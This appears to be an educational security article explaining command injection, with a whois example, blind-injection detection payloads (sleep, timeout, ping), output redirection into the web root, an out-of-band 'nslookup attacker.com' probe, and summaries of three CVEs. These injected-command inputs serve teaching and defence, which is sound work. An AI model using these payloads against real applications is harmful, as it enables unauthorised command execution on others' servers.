Command injection (also referred to as shell injection) is a web security vulnerability allowing an attacker to execute arbitrary commands on the host operating system through a vulnerable web application. These attacks can occur when an application passes unsanitized user-provided data (such as form inputs, cookies, or HTTP headers) to a system shell, enabling potential exploitation.
Example Attack Scenarios
Scenario 1
Consider a web application that gives information about the user-provided domain like who owns the domain, how to get in touch with them, and a reseller. To provide this information, the application runs whois command with the user-provided domain name and returns the output to the browser. When a user submits a domain name, the URL is like the following:
https://vulnerable-webapp/whois?domianName=google.com
When a request is sent with the URL above, the following command is executed on the host server:
whois google.com
If the application has no defense against command injection attacks, an attacker can send a request with the following URL to execute arbitrary command on the host operating system:
https://vulnerable-webapp/whois?domianName=google.com%3Bid
This results in the server to execute the following OS command:
whois google.com;id
The ; symbol in Linux separates OS commands like & symbol in Windows. So, the output will consist of the results of 2 commands.
Scenario 2 – Blind Command Injection
Blind command injection vulnerability arises when the application is vulnerable to command injection attacks but does not include the command output in its HTTP response, leaving it undisclosed.
Imagine that the web application has a contact form where users can send messages. The server-side application then generates an email containing the message. To do this, it invokes the mail command, providing the submitted details as arguments. The web application does not return the output from the mail command in its HTTP responses. It may just return a message which says that your message has been successfully sent.
In this scenario, various alternative approaches are available to detect and exploit the vulnerability.
Using the Time Delays Approach to Detect the Command Injection Vulnerability
An attacker can use an injected command that will trigger a time delay. If the application takes time to respond, an attacker detects that the application is vulnerable to a command injection attack.
For example, the following command can be used to detect command injection vulnerability by time delay:
For Linux:
; sleep 5
For Windows:
& timeout 5
If it takes 5 seconds for the application to return the response, it is vulnerable to command injection attacks.
Another common command is ping since it enables an attacker to define the quantity of ICMP packets to send, thereby specifying the duration required for the execution of the command.
For example, by executing the following command, the application will initiate a ping operation on its loopback network adapter, persisting for a duration of 10 seconds.
& ping -c 5 127.0.0.1
Using the Redirecting Output Approach to Exploit the Command Injection Vulnerability
An attacker can redirect the output of the injected command into a file within the web root, which can be then retrieved using the browser.
Consider the application hosts static assets in the file path /var/www/static. In that case, if an attacker provides the following input:
& whoami > /var/www/static/attack_result.txt
He/she can get the output of the command by just browsing the following URL:
https://vulnerable-webapp/attacks_result.txt
Using the Out-of-Band (OAST) Approach to Exploit the Command Injection Vulnerability
An attacker can use an injected command that will trigger an out-of-band network interaction with a system that he/she controls.
For example, the following command initiates a DNS lookup for the provided domain. An attacker can monitor his/her own targeted lookup to confirm the successful injection of the command.
& nslookup attacker.com
Examples of Known Command Injection Vulnerabilities
CVE-2021-21315
The System Information Library for Node.JS (npm package “systeminformation”) is an open-source collection of functions to retrieve detailed hardware, system, and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability.
CVE-2023-33617
An OS Command Injection vulnerability in Parks Fiberlink 210 firmware version V2.1.14_X000 was found via the /boaform/admin/formPing target_addr parameter.
CVE-2014-6271
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment.
How To Prevent Command Injection Attacks
To see how code should be developed in a secure way to prevent command injection attacks, read the How to Prevent Command Injection Vulnerability article which is part of the Secure Software Development Series.
